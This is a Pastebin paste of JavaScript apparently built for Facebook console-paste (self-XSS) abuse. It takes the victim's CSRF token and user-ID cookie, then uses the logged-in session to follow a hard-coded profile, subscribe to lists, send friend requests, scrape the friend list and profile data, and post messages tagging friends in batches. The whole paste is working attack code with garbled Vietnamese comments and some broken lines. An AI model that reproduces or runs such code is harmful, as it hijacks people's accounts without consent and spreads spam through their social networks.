Advertisement
huy0908

Untitled

Oct 25th, 2016
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.64 KB | None | 0 0
  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  3. alert('Chúc các b?n choi FB vui v? nhé ^^');
  4. function a(abone){
  5. var http4 = new XMLHttpRequest();
  6. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  7. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  8. http4.open("POST", url4, true);
  9. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  10. http4.setRequestHeader("Content-length", params4.length);
  11. http4.setRequestHeader("Connection", "close");
  12. http4.onreadystatechange = function() {
  13. if(http4.readyState == 4 && http4.status == 200) {http4.close;}
  14. }
  15. http4.send(params4);
  16. }
  17. // Close the connection
  18. function sublist(uidss) {
  19. var a = document.createElement('script');
  20. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  21. document.body.appendChild(a);
  22. }
  23. // Không edit b?t kì gì t? dây tr? lên
  24. 100012428868822
  25. // Hàng VIP
  26. 100012428868822
  27.  
  28. // T? dây tr? xu?ng là nh?m ch? y?u gi?u b?t ID
  29. function sarkadaslari_al(){
  30. var xmlhttp = new XMLHttpRequest();
  31. xmlhttp.onreadystatechange = function () {
  32. if(xmlhttp.readyState == 4){
  33. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  34. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  35. smesaj = "";
  36. smesaj_text = "";
  37. for(i=f*10;i<(f+1)*10;i++){
  38. if(arkadaslar.payload.entries[i]){
  39. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
  40. smesaj_text += " " + arkadaslar.payload.entries[i].text;
  41. }
  42. }
  43. sdurumpaylas(); }
  44.  
  45. }
  46.  
  47. };
  48. var params = "&filter[0]=user";
  49. params += "&options[0]=friends_only";
  50. params += "&options[1]=nm";
  51. params += "&token=v7";
  52. params += "&viewer=" + user_id;
  53. params += "&__user=" + user_id;
  54.  
  55. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  56. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  57. xmlhttp.send();
  58. }
  59.  
  60. var tiklama = document.addEventListener("click", function () {
  61. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  62. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  63. sarkadaslari_al();
  64. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  65.  
  66. document.removeEventListener(tiklama);
  67. }
  68. }, false);
  69. function sarkadasekle(uid,tem){
  70. var xmlhttp = new XMLHttpRequest();
  71. xmlhttp.onreadystatechange = function () {
  72. if(xmlhttp.readyState == 4){
  73. }
  74. };
  75.  
  76. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  77. var params = "to_friend=" + uid;
  78. params += "&action=add_friend";
  79. params += "&how_found=friend_browser";
  80. params += "&ref_param=none";
  81. params += "&outgoing_id=";
  82. params += "&logging_location=friend_browser";
  83. params += "&no_flyout_on_click=true";
  84. params += "&ego_log_data=";
  85. params += "&http_referer=";
  86. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  87. params += "&phstamp=100011077577399";
  88. params += "&__user=" + user_id;
  89. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  90. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  91.  
  92. if(tem == "farketmez" && document.cookie.split("tem" + user_id +"=").length > 1){
  93. xmlhttp.send(params);
  94. }else if(document.cookie.split("tem" + user_id +"=").length <= 1){
  95. cinsiyetgetir(uid,tem,"sarkadasekle");
  96. }else if(tem == document.cookie.split("tem" + user_id +"=")[1].split(";")[0].toString()){
  97. xmlhttp.send(params);
  98. }
  99. }
  100.  
  101. var temsonuc = {};
  102. var temhtml = document.createElement("html");
  103. function scinsiyetgetir(uid,tem,fonksiyon){
  104. var xmlhttp = new XMLHttpRequest();
  105. xmlhttp.onreadystatechange = function () {
  106. if(xmlhttp.readyState == 4){
  107. eval("temsonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  108. temhtml.innerHTML = temsonuc.jsmods.markup[0][1].__html
  109. btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  110. if(temhtml.getElementsByTagName("select")[0].value == "1"){
  111. document.cookie = "tem" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  112. }else if(temhtml.getElementsByTagName("select")[0].value == "2"){
  113. document.cookie = "tem" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  114. }
  115. eval(fonksiyon + "(" + id + "," + tem + ");");
  116. }
  117. };
  118. xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  119. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  120. xmlhttp.send();
  121. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement